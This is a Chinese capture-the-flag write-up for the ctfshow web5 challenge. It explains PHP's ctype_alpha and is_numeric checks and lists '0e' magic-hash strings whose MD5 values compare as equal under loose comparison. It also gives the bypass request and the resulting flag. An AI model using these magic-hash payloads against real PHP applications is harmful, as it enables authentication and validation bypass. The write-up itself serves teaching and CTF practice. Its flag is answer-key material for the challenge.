ctfshow WEB web5

ctype_alpha() 函数是PHP中的字符类型(CType)函数,用于检查给定的字符串是否仅包含字母。如果字符串只包含字母,它返回true,否则返回FALSE。

is_numeric() 函数是用于检测变量是否为数字或数字字符串。如果字符串只包含数字,它返回true ,否则返回FALSE。

get传递两个参数,v1和v2,如果v1和v2条件判断都为真,且对v1和v2的MD5值进行碰撞结果为真,则返回flag,否则返回输出where is flag。

在科学计数法中0e开头不管后边数是多少,它的数值都为0。以下是一些 0e 开头的 MD5

复制代码
QNKCDZO     => 0e830400451993494058024219903391
QLTHNDT		=> 0e405967825401955372549139051580
240610708   => 0e462097431906509019562988736854
s878926199a => 0e545993274517709034328855841020
s155964671a => 0e342768416822451524974117254469
s214587387a => 0e848240448830537924465865611904
s214587387a => 0e848240448830537924465865611904

在URL 后面传入参数,发现了 flag

复制代码
/?v1=QNKCDZO&v2=240610708
复制代码
ctfshow{285a0ce7-37ea-4ec9-84b9-986062311903}
相关推荐
nington011 小时前
为Splunk登录开启OTP二次验证,增强访问安全
安全
WoTrusSSL2 小时前
SSL证书如何保障人脸识别系统安全?
网络协议·系统安全·ssl
智联视频超融合平台3 小时前
视频联网平台智慧运维系统:智能时代的城市视觉中枢
运维·网络协议·安全·音视频·智慧城市·视频编解码
cainiao0806055 小时前
脑机交互安全:如何防止恶意脑电波指令注入
安全
XMYX-05 小时前
如何加强 SSH 安全:内网和专用网络环境下的防护策略
网络·安全·ssh
神经毒素5 小时前
WEB安全--SQL注入--无列名注入
sql·安全·web安全
网络安全宇哥5 小时前
零基础被迫参加CTF比赛?CTF高频解题技巧与经验分享
经验分享·安全·web安全·安全架构·waf
秋说5 小时前
【区块链安全 | 第十七篇】类型之引用类型(一)
安全·区块链
金丝猴也是猿5 小时前
如何抓取手机与服务器通信包?三种方法详解
websocket·网络协议·tcp/ip·http·网络安全·https·udp
久违 °6 小时前
【安全运营】关于攻击面管理相关概念的梳理(一)
安全·web安全·网络安全